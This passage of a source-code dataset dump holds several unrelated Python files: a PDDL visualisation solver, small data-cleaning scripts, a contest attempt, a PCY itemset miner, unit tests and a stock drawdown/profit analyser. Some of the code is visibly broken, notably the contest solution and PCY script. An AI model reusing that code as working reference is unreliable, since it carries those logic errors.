check_rule_complete(predicate, objects_dic, predicates_rules):\n    \"\"\"\n    This function checks whether the predicate can be solved yet.\n    It checks all the referenced object values by using the predicates_rules;\n    for example, with (on a b) as the predicate, the animation rules say that to define\n    the position of a, it must know b's x position and y position first. 
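In the animation profile this\n    dependency is expressed through the rule's \"require\" field; judging from the\n    loop below its shape is e.g. require = {\"?x\": [\"x\", \"y\"]}, meaning the object\n    bound to ?x must already have \"x\" and \"y\" defined. 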
If b's referenced\n    value has not been defined, the check_rule_complete function will return False.\n\n    :param predicate: a predicate that needs to be checked, e.g. (on-table b).\n    :param objects_dic: the current objects dictionary that needs to be solved.\n    :param predicates_rules: rules defining the animation behaviour of the predicates.\n    :return: True: if the predicate can be solved.\n             False: if the predicate can not be solved.\n    \"\"\"\n\n    pname = predicate[\"name\"]\n    predicate_rule = predicates_rules[pname]\n    objects_list_ref = predicate_rule[\"objects\"]\n    objects = predicate[\"objectNames\"]\n    if \"custom_obj\" in predicate_rule:\n        # additional custom object not in the real pddl file\n        custom_obj = predicate_rule[\"custom_obj\"]\n        # complete object list\n        object_list = objects + custom_obj\n        objects_list_ref = objects_list_ref + custom_obj\n    else:\n        object_list = objects\n    obj_ref_dic = dict(zip(objects_list_ref, object_list))\n    if \"require\" in predicate_rule:\n        for obj_index in predicate_rule[\"require\"]:\n            for property in predicate_rule[\"require\"][obj_index]:\n                objectname = obj_ref_dic[obj_index]\n                if objects_dic[objectname][property] is False:\n                    return False\n    return True\n\n\ndef applypredicates(predicate,\n                    objects_dic,\n                    predicates_rules,\n                    gstate):\n    \"\"\"\n    Update the values of the related objects in objects_dic by applying the animation rules.\n    For example, (on-table a) will set a's x value by using the distributex function and a's\n    y value to 0.\n    :param predicate: a predicate that needs to be solved.\n    :param objects_dic: an objects dictionary that contains all the objects and their attributes.\n    :param predicates_rules: rules defining the animation behaviour of the predicates.\n    :param gstate: a dictionary which remembers all the state for the custom functions.\n    :return:\n    \"\"\"\n\n    pname = predicate[\"name\"]\n    predicate_rule = predicates_rules[pname]\n    objects_list_ref = predicate_rule[\"objects\"]\n    # objects in the real pddl file\n    objects = copy.deepcopy(predicate[\"objectNames\"])\n    if \"custom_obj\" in predicate_rule:\n        # additional custom object not in the real pddl file\n        custom_obj = predicate_rule[\"custom_obj\"]\n        # complete object list\n        object_list = objects + custom_obj\n        objects_list_ref = objects_list_ref + custom_obj\n    else:\n        object_list = objects\n\n    obj_ref_dic = dict(zip(objects_list_ref, object_list))\n    for rulename in predicate_rule[\"rules\"]:\n        if \"value\" in predicate_rule[rulename]:\n            rule = predicate_rule[rulename]\n            left, propertyname = get_objname_property(rule[\"left\"], obj_ref_dic)\n            value = predicate_rule[rulename][\"value\"]\n            if \"function\" in value:\n                fproperty = value[\"function\"]\n                fname = fproperty[\"fname\"]\n                obj_indexs = fproperty[\"obj_indexs\"]\n                if \"settings\" in fproperty:\n                    settings = fproperty[\"settings\"]\n                else:\n                    settings = {}\n                state = gstate[fname]\n                obj_list = []\n                for obj_index in obj_indexs:\n                    objname = obj_ref_dic[obj_index]\n                    obj_list.append({objname: objects_dic[objname]})\n                result = Custom_functions.customf_controller(fname, obj_list, settings, state, False)\n                update_object(objects_dic[left], propertyname, gstate, fname, result)\n            elif \"equal\" in value:\n                right_value = value[\"equal\"]\n                if type(right_value) is not dict:\n                    objects_dic[left][propertyname[0]] = right_value\n                else:\n                    if \"r\" in right_value:  # for color\n                        objects_dic[left][propertyname[0]] = right_value\n                    else:\n                        right_object, right_property = get_objname_property(right_value, obj_ref_dic)\n                        objects_dic[left][propertyname[0]] = objects_dic[right_object][right_property]
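\n\n            # The \"add\" rule below sums referenced properties and numeric\n            # constants; e.g. (hypothetical shape) value[\"add\"] = [{\"?y\": \"x\"}, 10]\n            # sets the target property to ?y's x value plus 10.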
\n            elif \"add\" in value:\n                rightvalue = 0\n                for additem in value[\"add\"]:\n                    if type(additem) is dict:\n\n                        right_object, right_property = get_objname_property(additem, obj_ref_dic)\n                        addvalue = objects_dic[right_object][right_property]\n                        rightvalue += addvalue\n                    else:\n                        rightvalue += additem\n                objects_dic[left][propertyname[0]] = rightvalue\n        else:\n            # if the rule is an action rule\n            action = predicate_rule[rulename][\"action\"]\n            if \"function\" in action:\n                fproperty = action[\"function\"]\n                fname = fproperty[\"fname\"]\n                obj_indexs = fproperty[\"obj_indexs\"]\n                if \"settings\" in fproperty:\n                    settings = fproperty[\"settings\"]\n                else:\n                    settings = {}\n                state = gstate[fname]\n                obj_list = []\n                for obj_index in obj_indexs:\n                    objname = obj_ref_dic[obj_index]\n                    obj_list.append({objname: objects_dic[objname]})\n\n                key, value = Custom_functions.customf_controller(fname, obj_list, settings, state, False)\n                objects_dic[key] = value\n\n\ndef get_objname_property(property_dic, obj_ref_dic):\n    \"\"\"\n    This function turns a generic (object index, property) dict into a specific object and property tuple.\n    :param property_dic: dictionary mapping an object index to its property, e.g. {\"?x\": [\"x\"]}\n    :param obj_ref_dic: dictionary mapping an object index to its corresponding object, e.g. {\"?x\": \"obj\"}\n    :return: a tuple which contains the object name and its properties, e.g. (\"obj\", \"x\")\n    \"\"\"\n\n    object_index, propertyname = list(property_dic.items())[0]\n    objname = obj_ref_dic[object_index]\n    return objname, propertyname\n\n\ndef update_object(objectdic, properties, gstate, fname, result):\n    \"\"\"\n    This function updates an object dict based on the custom function result\n    :param objectdic: a single object dictionary that needs to be updated\n    :param properties: properties of the object that need to be updated\n    :param gstate: state of all the custom functions\n    :param fname: function name\n    :param result: custom function result\n\n    \"\"\"\n    new_properties, newstate = result\n    gstate[fname] = newstate\n    if len(properties) != len(new_properties):\n        raise ValueError(\"custom function: \" + fname + \" returns \" + str(len(new_properties)) + \" properties, but \"\n                         + str(len(properties)) + \" properties were given.\")\n    try:\n        for property in properties:\n            objectdic[property] = new_properties[property]\n    except:\n        helpinfo = \"(\"\n        for key in new_properties.keys():\n            helpinfo += str(key) + \" \"\n        helpinfo += \")\"\n        raise ValueError(\"Property \" + str(property) + \" is not returned by custom function:\" + fname +\n                         \", properties \" + helpinfo + \" were returned\")\n\n\ndef solvepredicates(predicates, objects_dic, predicates_rules, gstate):\n    \"\"\"\n    This function pops a predicate from the list of predicates and tries to solve\n    it; the predicate is put back into the predicates list if it can not be solved in\n    one pass. The function returns True once all the predicates have been solved.\n    :param predicates: a list of predicates that need to be solved.\n    :param objects_dic: a dictionary of objects whose attributes have to be solved\n    :param predicates_rules: animation rules of the predicates.\n    :param gstate: global state of all custom functions\n    :return: True if the predicates are solved\n    \"\"\"
\n    i = 0\n    while (predicates and i < 2000):\n        predicate = predicates.pop(0)\n        if predicate[\"name\"] not in predicates_rules:\n            continue\n        if check_rule_complete(predicate, objects_dic, predicates_rules):\n\n            applypredicates(predicate, objects_dic, predicates_rules, gstate)\n        else:\n            if not predicates:  # if the last predicate can not be solved\n                return False\n            predicates.append(predicate)\n        i += 1\n    return True\n\n\ndef keysort(predicate_name, predicates_rules):\n    \"\"\"\n    This function returns a weight for each predicate; the default is 10 (not important).\n    0 means very important.\n    :param predicate_name: name of a predicate\n    :param predicates_rules: predicate_rules for all the predicates\n    :return: integer\n    \"\"\"\n    if predicate_name in predicates_rules:\n        if \"priority\" in predicates_rules[predicate_name]:\n            return predicates_rules[predicate_name][\"priority\"]\n        else:\n            return 10\n    else:\n        return 10\n\n\ndef priority(predicates, predicates_rules):\n    \"\"\"\n    This function returns the predicates sorted by their priority value\n    :param predicates: list of predicates\n    :param predicates_rules: predicate_rules for all the predicates\n    :return: sorted predicates list\n    \"\"\"\n    return sorted(predicates, key=lambda k: keysort(k[\"name\"], predicates_rules))\n\n\ndef solve_all_stages(stages, objects_dic, predicates_rules, gstate, actionlist, problem_dic):\n    \"\"\"\n    This function runs through each stage, which contains a list of predicates, solves the\n    predicates and builds the solved visualisation file.\n    :param stages: a dictionary which contains the list of predicates for the different stages/steps.\n    :param objects_dic: a dictionary of objects which need to be solved.\n    :param predicates_rules: animation rules for the predicates\n    :param gstate: (global state) a dictionary containing all the custom function state information\n    :param actionlist: action list\n    :param problem_dic: problem dictionary containing the goal state\n    :return: visualisation dictionary that contains the location of each object for the different stages\n    \"\"\"\n\n    result = {}\n    result[\"visualStages\"] = []\n    for stage in stages:\n\n        stage_dic = {}\n        object_dic_copy = copy.deepcopy(objects_dic)\n        predicates = stage[\"items\"]\n        sorted_predicates = priority(predicates, predicates_rules)\n\n        # For hanoi problem, reset each stage\n        # For logistics problem, reset each stage\n        for fname in gstate[\"reset_function\"]:\n            gstate[fname] = {}\n        solvepredicates(sorted_predicates, object_dic_copy, predicates_rules, gstate)\n        stage_dic[\"visualSprites\"] = object_dic_copy\n        if \"stageName\" not in stage:\n            stage_dic[\"stageName\"] = \"Initial Stage\"\n            stage_dic[\"stageInfo\"] = \"No step information\"\n\n        else:\n            stage_dic[\"stageName\"] = stage[\"stageName\"]\n            stage_dic[\"stageInfo\"] = stage[\"stageInfo\"]\n\n        result[\"visualStages\"].append(stage_dic)\n\n    result[\"subgoals\"] = Subgoal.get_subgoal(stages, problem_dic[1]['goal'].copy(), actionlist.copy())\n\n    return result\n\n\ndef add_custome_objects(object_dic, animation_profile):\n    \"\"\"\n    This function adds the custom objects to object_dic\n    :param object_dic: an object 
dictionary containing the default objects.\n    :param animation_profile: a dict that stores all the information in the animation profile.\n    :return:\n    \"\"\"\n    for visual in animation_profile[\"objects\"][\"custom\"]:\n        objects = animation_profile[\"objects\"][\"custom\"][visual]\n        for obj_name in objects:\n            object_dic[obj_name] = animation_profile[\"visual\"][visual].copy()\n            object_dic[obj_name][\"name\"] = obj_name\n\n\ndef get_visualisation_dic(predicates, animation_profile, actionlist, problem_dic):\n    \"\"\"\n    This function is the main function of this module; it calls the other functions\n    to build the visualisation file for the Unity visualiser.\n    :param predicates: a dictionary containing (1) the object names and (2) the predicates for each stage.\n    :param animation_profile: a dict that stores all the information in the animation profile.\n    :param actionlist: list of actions to achieve the goal\n    :param problem_dic: problem dictionary containing the init and goal predicates\n    :return: dictionary containing all the solved stages for visualisation\n    \"\"\"\n\n    object_list = copy.deepcopy(predicates[\"objects\"])\n    stages = copy.deepcopy(predicates[\"stages\"])\n    predicates_rules = animation_profile[\"predicates_rules\"]\n    objects_dic = Initialise.initialise_objects(object_list, animation_profile)\n    gstate = Initialise.initialise_custom_functions()\n    add_custome_objects(objects_dic, animation_profile)\n    result = solve_all_stages(stages, objects_dic, predicates_rules, gstate, actionlist, problem_dic)\n\n    return result\n","sub_path":"server/app/vfg/solver/Solver.py","file_name":"Solver.py","file_ext":"py","file_size_in_byte":14852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"522023971","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport sys\nimport multiprocessing as mp\n\nmaindirectory = \"G:/Behavioral Data/Sonntag Lab Dropbox/Phenotyper/Investigators/\" \ninvestigator = str(sys.argv[1])\ntreatment = str(sys.argv[2])\ndirectory0 = maindirectory + investigator + \"/\"\ndirectory1 = directory0 + \"Data/Raw/\" + treatment + \"/\"\n\ndef Mouse(mouselocation):\n\tmouse = pd.read_csv(mouselocation)\n\tdel mouse[\"Unnamed: 0\"]\n\tmouse.to_csv(mouselocation, index=False)\n\t\nos.chdir(directory1)\nanimals = os.listdir()\n\nif __name__=='__main__':\n\tpool = mp.Pool(processes=4)\n\tpool.map_async(Mouse, animals)\n\tpool.close()\n\tpool.join()","sub_path":"removeindexcolumn.py","file_name":"removeindexcolumn.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"259960446","text":"\"\"\"\r\nGiven a text file, write a program to create another text file deleting the words 'a', 'an', 'the' and replacing\r\neach one of them with a blank space.\r\n\"\"\"\r\n\r\nwith open('sample-text.txt', 'r') as file:\r\n    with open('updated-sample-text.txt', 'w') as file2:\r\n        lines = file.readlines()\r\n        for line in lines:\r\n            line = line.replace(' a ', ' ')\r\n            line = line.replace(' an ', ' ')\r\n            line = line.replace(' the ', ' ')\r\n            file2.writelines(line)","sub_path":"Chapter-16-File-Input-Output/Exercise/B/k-replace-articles-in-file-with-space.py","file_name":"k-replace-articles-in-file-with-space.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"251815575","text":"n = int(input())\naes = list(map(int, input().split()))\n\naes_left = 
aes[:]\n\nans = 0\ni = 0\nwhile i < n // 2:\n s = n // 2\n maxs = 0\n maxhappys = 0\n while s < n:\n if aes[s] * (s - i) > maxhappys:\n maxhappys = aes[s] * (s - i)\n maxs = s\n s += 1\n aes[maxs] = 0\n ans += maxhappys\n\n t = 1\n maxt = 0\n maxhappyt = 0\n while t < n // 2 + 1:\n if aes[-t] * (-t - 1) > maxhappyt:\n maxhappyt = aes[t] * (-t -1)\n maxt = t\n t += 1\n aes[maxt] = 0\n ans += maxhappyt\n\n print(maxhappys, maxhappyt, aes)\n\n i+= 1\n \nprint(ans)","sub_path":"beginner_contest163/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"610633314","text":"import sys\n\ndef hashing_func(tablesize,string_to_hash):\n sum = 0\n for i in string_to_hash:\n sum+=ord(i)\n hash_value=sum%tablesize\n return(hash_value)\n\ndef getWords(words_file):\n word_count_map = {}\n with open(words_file, 'r') as f:\n for line in f.readlines():\n for word in line.strip().split(\",\"):\n if word in word_count_map:\n word_count_map[word] += 1\n else:\n word_count_map[word] = 1\n return word_count_map\n\ndef Singles():\n min_support=int(sys.argv[2])\n inputdata = open(sys.argv[1])\n SingleWords=[]\n no_of_buckets=int(sys.argv[3])\n bitmap=[]*no_of_buckets \n bucket_count=[0]*no_of_buckets\n wordsDict = getWords(sys.argv[1])\n for keys in sorted(wordsDict.keys()):\n if wordsDict[keys]>=min_support:\n SingleWords.append(keys)\n if SingleWords:\n print (\"Frequent Itemsets of size 1\")\n for word in sorted(SingleWords):\n print (word)\n print(\"\\n\")\n\n\n inputdata = open(sys.argv[1])\n for line in inputdata:\n itemsperline=[]\n for words in line.strip().split(\",\"):\n itemsperline.append(words) \n \n for i in range(0,len(itemsperline)-1):\n for j in range(0,len(itemsperline)):\n hash_val=hashing_func(no_of_buckets,(itemsperline[i]+itemsperline[j]))\n bucket_count[hash_val]+=1\n for value in bucket_count:\n if valueitemsperline[i]:\n pairing.append((itemsperline[i],itemsperline[j]))\n else :\n pairing.append((itemsperline[i],itemsperline[i]))\n norepeat = []\n [norepeat.append(item) for item in pairing if item not in norepeat]\n word_count_dict={}\n inputdata = open(sys.argv[1])\n for line in inputdata:\n for word in norepeat:\n if word[0] in line and word[1] in line:\n if word[0]word[1]:\n tuple1=(word[1],word[0])\n word_count_dict[tuple1] = word_count_dict.get(tuple1, 0) + 1\n FreqPairs=[]\n for tuple1 in word_count_dict:\n if word_count_dict[tuple1]>=min_support:\n FreqPairs.append((tuple1[0]+\",\"+tuple1[1]))\n if FreqPairs:\n print (\"Frequent Itemsets of size 2\")\n for item in sorted(FreqPairs):\n print(item)\n return FreqPairs\n\ndef Gen_pcy(type_of_data,SingleWords,IncreasingList):\n min_support=int(sys.argv[2])\n print(\"\\n\")\n large_data_list=[] \n Resultant_List=[]\n for w1 in SingleWords:\n for w2 in IncreasingList:\n if w1 not in w2:\n holder=[]\n holder.append((w1+\",\"+w2))\n large_data_list.append(sorted(holder[0].split(\",\")))\n for bucket_item in large_data_list:\n indicator=1;\n for index in range (0,len(bucket_item)):\n pos=0\n str=\"\"\n while pos=min_support:\n Resultant_List.append(bucket_item)\n Final=[]\n for items in Resultant_List:\n string1=\"\"\n for item in items:\n if string1==\"\":\n string1=string1+item\n else:\n string1=string1+\",\"+item\n Final.append(string1)\n norepeat = []\n [norepeat.append(items) for items in Final if items not in norepeat]\n if norepeat:\n str=\"Frequent Itemsets of size \"\n str+=format(type_of_data)\n print (str)\n for data in 
norepeat:\n print(data)\n return norepeat\n\nif __name__ == '__main__':\n type_of_data=1\n SingleWords,bitmap=Singles()\n if SingleWords:\n type_of_data+=1\n IncreasingList=Pairs(SingleWords,bitmap)\n type_of_data+=1\n while IncreasingList:\n Received_Data=[]\n Received_Data=Gen_pcy(type_of_data,SingleWords,IncreasingList)\n IncreasingList=Received_Data\n type_of_data+=1 \n","sub_path":"PCY.py","file_name":"PCY.py","file_ext":"py","file_size_in_byte":5551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"203565387","text":"\"\"\" Tests for emitter_utils \"\"\"\nfrom ast import Attribute, Call, Expr, Load, Name, Subscript, keyword\nfrom copy import deepcopy\nfrom unittest import TestCase\n\nfrom doctrans.ast_utils import set_value\nfrom doctrans.emitter_utils import interpolate_defaults, parse_out_param\nfrom doctrans.pure_utils import rpartial\nfrom doctrans.tests.mocks.argparse import argparse_add_argument_ast, argparse_func_ast\nfrom doctrans.tests.mocks.ir import intermediate_repr\nfrom doctrans.tests.utils_for_tests import unittest_main\n\n\nclass TestEmitterUtils(TestCase):\n \"\"\" Test class for emitter_utils \"\"\"\n\n def test_parse_out_param(self) -> None:\n \"\"\" Test that parse_out_param parses out the right dict \"\"\"\n self.assertDictEqual(\n parse_out_param(\n next(filter(rpartial(isinstance, Expr), argparse_func_ast.body[::-1]))\n )[1],\n # Last element:\n intermediate_repr[\"params\"][\"data_loader_kwargs\"],\n )\n\n def test_parse_out_param_default(self) -> None:\n \"\"\" Test that parse_out_param sets default when required and unset \"\"\"\n\n self.assertDictEqual(\n parse_out_param(argparse_add_argument_ast)[1],\n {\"default\": 0, \"doc\": None, \"typ\": \"int\"},\n )\n\n def test_parse_out_param_fails(self) -> None:\n \"\"\" Test that parse_out_param throws NotImplementedError when unsupported type given \"\"\"\n self.assertRaises(\n NotImplementedError,\n lambda: parse_out_param(\n Expr(\n Call(\n args=[set_value(\"--num\")],\n func=Attribute(\n Name(\"argument_parser\", Load()),\n \"add_argument\",\n Load(),\n ),\n keywords=[\n keyword(\n arg=\"type\",\n value=Subscript(\n expr_context_ctx=None,\n expr_slice=None,\n expr_value=None,\n ),\n identifier=None,\n ),\n keyword(\n arg=\"required\",\n value=set_value(True),\n identifier=None,\n ),\n ],\n expr=None,\n expr_func=None,\n )\n )\n ),\n )\n\n def test_interpolate_defaults(self) -> None:\n \"\"\" Test that interpolate_defaults corrects sets the default property \"\"\"\n param = \"K\", deepcopy(intermediate_repr[\"params\"][\"K\"])\n param_with_correct_default = deepcopy(param[1])\n del param[1][\"default\"]\n self.assertDictEqual(interpolate_defaults(param)[1], param_with_correct_default)\n\n\nunittest_main()\n","sub_path":"doctrans/tests/test_emitter_utils.py","file_name":"test_emitter_utils.py","file_ext":"py","file_size_in_byte":3029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"60464285","text":"\"\"\"\nImplemented algorithms\ndivide and conquer, sorting for computing max drawdown of a stock and multithreading for speeding up computing\nGreedy algorithm for calculating the maximal profit that is made by trading (long one share or not) a stock without commission\nDynamic programming for calculating the maximal profit that is made by trading (long one share or not) a stock with commission\nauthor: Yi Rong\nupdated on 1/25/21\n\"\"\"\n\n\nimport pandas_datareader as web\nimport datetime as dt\nfrom 
pandas_datareader._utils import RemoteDataError\nimport concurrent.futures\nimport matplotlib.pyplot as plt\n\n\nclass TradeAssistant:\n\n ################## TradeAssistant initialization ##################\n def __init__(self, L_symbol, start, end):\n self.L_symbol = L_symbol\n self.start = start\n self.end = end\n L_data = self.get_raw_data()\n self.dict_raw_data = L_data[0]\n self.L_ts = L_data[1]\n self.fee = 1\n\n def get_raw_data(self):\n \"\"\"\n Download raw data from yahoo finance and return all results in a dictionary\n \"\"\"\n dict_raw_data = {}\n L_ts = []\n for symbol in self.L_symbol:\n try:\n df_symbol = web.get_data_yahoo(symbol, start=self.start, end=self.end)\n dict_raw_data[symbol] = df_symbol['Adj Close'].round(5)\n except RemoteDataError:\n print(\"No data fetched for symbol\" + symbol)\n\n L_ts.append(dict_raw_data[symbol])\n return [dict_raw_data, L_ts]\n\n ################## MDD ##################\n # Step 1\n def get_cummax(self, ts):\n \"\"\"\n Intent: get a cumulative max series and index of max.\n returnL is a list denotes the cumulative max of self.ts and its index, which means\n there are two values in each element. first value is the cumulative max, the second value is its index.\n e.g. self.ts = [10, 9, 8, 9, 12] ==>\n returnL = [[10, 0], [10, 0], [10, 0], [10, 0], [12, 4]]\n\n Precondition: The global variable self.ts is the time series input of this\n function.\n\n Postcondition1: (max) returnL[i][0] >= self.ts[j], for j in [0, i];\n (index) returnL[i][1] <= i;\n i can be any integer among [0, len(self.ts) - 1]\n \"\"\"\n i, i_max = 0, 0\n returnL = []\n cur_max = ts[i]\n while i < len(ts):\n if cur_max < ts[i]:\n cur_max = ts[i]\n i_max = i\n returnL.append([cur_max, i_max])\n i += 1\n return returnL\n\n # Step 2: Divide and Conquer\n def get_mdd_between(self, ts, L_cummax, a_begin, an_end):\n \"\"\"\n Intent: find the minimal value among a drawdown series and the start and end index of the max drawdown using divide and conquer\n\n Shorthand: L = len(ts)\n Precondition 1: ts is a list or a time series of floats\n Precondition 2: L_cummax is a list denotes the cumulative max of ts and its index, which means\n there are two values in each element. first value is the cumulative max, the second value is its index.\n e.g. ts = [10, 9, 8, 9, 12] ==> L_cummax = [[10, 0], [10, 0], [10, 0], [10, 0], [12, 4]]\n e.g. 
ts & L_cummax ==> returnL = [0, 2, -20%]\n Pre3: 0 <= a_begin < L\n\n Postcondition 1 (Subsequence): 0 <= returnL[0] <= returnL[1] < L\n Post2 (L_cummax): L_cummax[a_begin][1] <= a_begin\n Post3 (Minimal): returnL[2] is minimal\n Post4 (max drawdown Constraint): 0 >= returnL[2] >= -1\n \"\"\"\n\n returnL = [None] * 3\n\n \"\"\"\n ===Sa (Solvable Immediately?):\n an_end_index = a_begin_index & Postcondition 1-3 & this returned\n –XOR–\n mid = int((a_begin + an_end) / 2) \n \"\"\"\n if a_begin == an_end: # immediately satisfy all postconditions\n returnL[0] = L_cummax[a_begin][1]\n returnL[1] = a_begin\n returnL[2] = ts[a_begin] / L_cummax[a_begin][0] - 1\n return returnL\n else:\n mid = int((a_begin + an_end) / 2)\n\n # ===Sb1: Postcondition holds on a_list[:mid+1]?\n left_res = self.get_mdd_between(ts, L_cummax, a_begin, mid)\n\n # ===Sb2: Postcondition holds on a_list[mid+1:]\n right_res = self.get_mdd_between(ts, L_cummax, mid + 1, an_end)\n\n # ===Sc (Conquered) = Postconditions\n\n # Satisfy Pos3\n if left_res[2] < right_res[2]:\n return left_res\n\n else:\n return right_res\n\n # Greedy algorithm\n def get_max_profit(self, ts):\n \"\"\"\n intent: get the maximal profit that can be made by making transactions based on a time series stock price data,\n there is no limit on the number transactions, but you can only hold one or zero share of stock at any time\n Precondition1: ts is a list or a time series of floats\n Precondition2 (positive price): ts[i] > 0 for all i\n\n Postcondition1: return_res >= 0\n Postcondition2: return_res is maximal\n \"\"\"\n\n #Sa: ts is an empty list, 0 is returned\n if len(ts) == 0:\n return 0\n\n #Sb (Parts): return_res is the solution for ts[:i] for i in [1, len(ts)]\n #Sc (Greed used): return_res starts from 0 and will add positive difference: ts[i] - ts[i - 1], i in [1, len(ts))\n #Example: ts = [1, 3, 2, 4, 3],\n # lag(ts)= [1, 3, 2, 4]\n #differences = [2,-1, 2,-1], so return_res = 0 + 2 + 2\n return_res = 0\n for i in range(1, len(ts)):\n if ts[i] - ts[i - 1] > 0:\n return_res += (ts[i] - ts[i - 1])\n\n # Sd: i is maximal, return_res is divided by the first-day price to make it a profit ratio\n return_res = return_res / ts[0]\n return return_res\n\n # DP\n def get_max_profit_with_transactionfee(self, ts):\n \"\"\"\n intent: get the maximal profit that can be made by making transactions based on a time series stock price data,\n you can only hold one or zero share of stock at any time and you need to pay a transaction fee for each transaction,\n buy and sell refer to one transaction.\n Precondition1: ts is a list or a time series of floats\n Precondition2 (positive price): ts[i] > 0 for all i\n Precondition3 (positive fee): self.fee is a float number and fee > 0\n\n Postcondition1: return_res >= 0\n Postcondition2: return_res is maximal\n \"\"\"\n\n #Sa: ts is an empty list, 0 is returned\n if len(ts) == 0:\n return 0\n\n #Sb: cash_ is the profit that we hold cash instead of holding stock, hold_ is the profit that we hold stock\n # cash_ and hold_ are initialized for the first day\n cash_ = 0\n hold_ = -ts[0]\n\n # aProblem = The maximal profit of holding cash or a stock that is transited from the last cash_ and hold_.\n def _getDPSol(cash_, hold_):\n \"\"\"\n Precondition1: the solution for each day is between cash_ and hold_, which are knownS\n\n Postcondition1: knownS contains a solution for aProblem\n \"\"\"\n #Sa (transition): on day i, the max profit of holding cash or a stock is transitted from day i -1.\n for i in range(1, len(ts)):\n # Sb1: on 
day i, our max profit of holding cash can be determined between keeping cash or selling a stock\n                # keep cash, sell stock and pay transaction fee\n                cash_ = max(cash_, hold_ + ts[i] - self.fee)\n                # Sb2: on day i, our max profit of holding a stock can be determined between keeping the stock or buying a stock\n                # keep stock, buy a stock\n                hold_ = max(hold_, cash_ - ts[i])\n\n            # Sc (completed): on the last day, cash_ is the solution\n            return cash_\n\n        # Sd: the max profit is divided by the first-day price to make it a profit ratio\n        return_res = _getDPSol(cash_, hold_) / ts[0]\n        return return_res\n\n\n    def get_analysis(self, ts):\n        \"\"\"\n        intent: combine get_cummax, get_mdd_between, get_max_profit in one function so that this function can be used in multithreading\n\n        Precondition 1: ts is a list or a time series of floats\n\n        Postcondition 1 (Subsequence): 0 <= returnL[0] <= returnL[1] < L\n        Post2 (Minimal): returnL[2] is minimal\n        Post3 (max drawdown Constraint): 0 >= returnL[2] >= -1\n        \"\"\"\n        L_cummax = self.get_cummax(ts)\n        return_res = self.get_mdd_between(ts, L_cummax, 0, (len(L_cummax) - 1))\n        return_res.append(self.get_max_profit(ts))\n        return_res.append(self.get_max_profit_with_transactionfee(ts))\n\n        return return_res\n\n    def do_multithreading(self):\n        \"\"\"\n        intent: get max drawdown results for multiple time series using multithreading\n\n        Precondition 1: self.L_ts is a list, its element is a time series of floats\n        Pre2: self.get_analysis is a function that can get analysis results like\n        max drawdown, max profit, max profit with transaction fee for each element in self.L_ts\n\n        Postcondition 1: len(return_L_mdd) = len(self.L_ts)\n        Post2: the order of return_L_mdd should be the same as self.L_ts, which is also the order of self.L_symbol\n        Post3: each list element of return_L_mdd has its corresponding symbol as the fourth element.\n        return_L_mdd[i][3] = self.L_symbol[i] for i in [0, len(self.L_ts) - 1]\n        \"\"\"\n        with concurrent.futures.ThreadPoolExecutor() as executor:\n            # ---S1 Thread self.get_analysis(self.L_ts[0]) started, which attains results_[0] = self.get_analysis(self.L_ts[0])\n            # ---S2 Thread self.get_analysis(self.L_ts[1]) started, which attains results_[1] = self.get_analysis(self.L_ts[1])\n            # ...\n            # ---Sn Thread self.get_analysis(self.L_ts[n - 1]) started, which attains results_[n - 1] = self.get_analysis(self.L_ts[n - 1])\n            # ---Total number of len(self.L_ts) threads started\n            results_ = executor.map(self.get_analysis, self.L_ts)\n            \"\"\"\n            executor.map starts a worker for each element in self.L_ts and applies self.get_analysis to it.\n            One advantage of this function is that the returned results_ will have the same order as self.L_ts, rather than an order based on computational efficiency.\n            \"\"\"\n            # ---Sn+1: Threads in S1, S2, ..., Sn completed\n            # ---Sn+2: results_[i] = self.get_analysis(self.L_ts[i]) for i in [0, len(self.L_ts) - 1]\n\n            # ---Sn+3: for each list element in results_, add its corresponding symbol as the fourth element in the list element\n            return_L_mdd = []\n            for i, result in enumerate(results_):\n                result.append(self.L_symbol[i])\n                return_L_mdd.append(result)\n\n            return return_L_mdd\n\n    def merge_sort(self, a_list, col):\n        \"\"\"\n        intent: a_list is a list in which each element is a list; this function will sort a_list based on a certain element of each list element, which refers to a_list[i][col] for i in [0, len(a_list) - 1]\n\n        precondition1: len(a_list) > 0\n        pre2: len(a_list[i]) is the same for i in [0, len(a_list) - 1] and 
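# ---- Editor's aside (hedged sketch; the prices and fee below are invented) ----
# A self-contained version of the cash/hold recurrence that
# get_max_profit_with_transactionfee implements above.
def _max_profit_with_fee_demo(prices, fee):
    if not prices:
        return 0
    cash, hold = 0, -prices[0]
    for p in prices[1:]:
        cash = max(cash, hold + p - fee)  # sell today, paying the fee once per round trip
        hold = max(hold, cash - p)        # buy today out of the best cash position
    return cash

assert _max_profit_with_fee_demo([1, 3, 2, 8, 4, 9], fee=2) == 8  # buy 1/sell 8, buy 4/sell 9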
len(a_list[i]) >= (col + 1)\n pre3: -1 <= a_list[i][col] <= 0 for i in [0, len(a_list) - 1]\n\n postcondition1: return_list will be a sorted version of a_list, which means if len(return_list) > 2\n return_list[i][col] <= return_list[i + 1][col] <= return_list[i + 2][col] <= ...\n post2: return_list is the same multiset of a_list\n \"\"\"\n\n # ---Sa (Solvable Immediately?):\n # len(a_list) == 1 & Postconditions & This returned\n # –XOR–\n # mid = int(len(a_list) / 2)\n\n # if not immediately satisfy all postconditions?\n if len(a_list) > 1:\n\n # then\n mid = int(len(a_list) / 2)\n\n # ---Sb1: Postconditions hold on a_list[:mid]\n left = a_list[:mid].copy()\n self.merge_sort(left, col)\n\n # ---Sb2: Postconditions hold on a_list[mid:]\n right = a_list[mid:].copy()\n self.merge_sort(right, col)\n\n # ---Sc (Conquered) = Postconditions\n l = 0 # index in left\n r = 0 # index in right\n k = 0 # index in a_list and a_list[:mid] = left, a_list[mid:] = right\n\n # ---Sc1 (some sorted): a_list[:k] is sorted when l < len(left) and r < len(right)\n # and k = l + r\n while l < len(left) and r < len(right):\n if left[l][col] <= right[r][col]:\n a_list[k] = 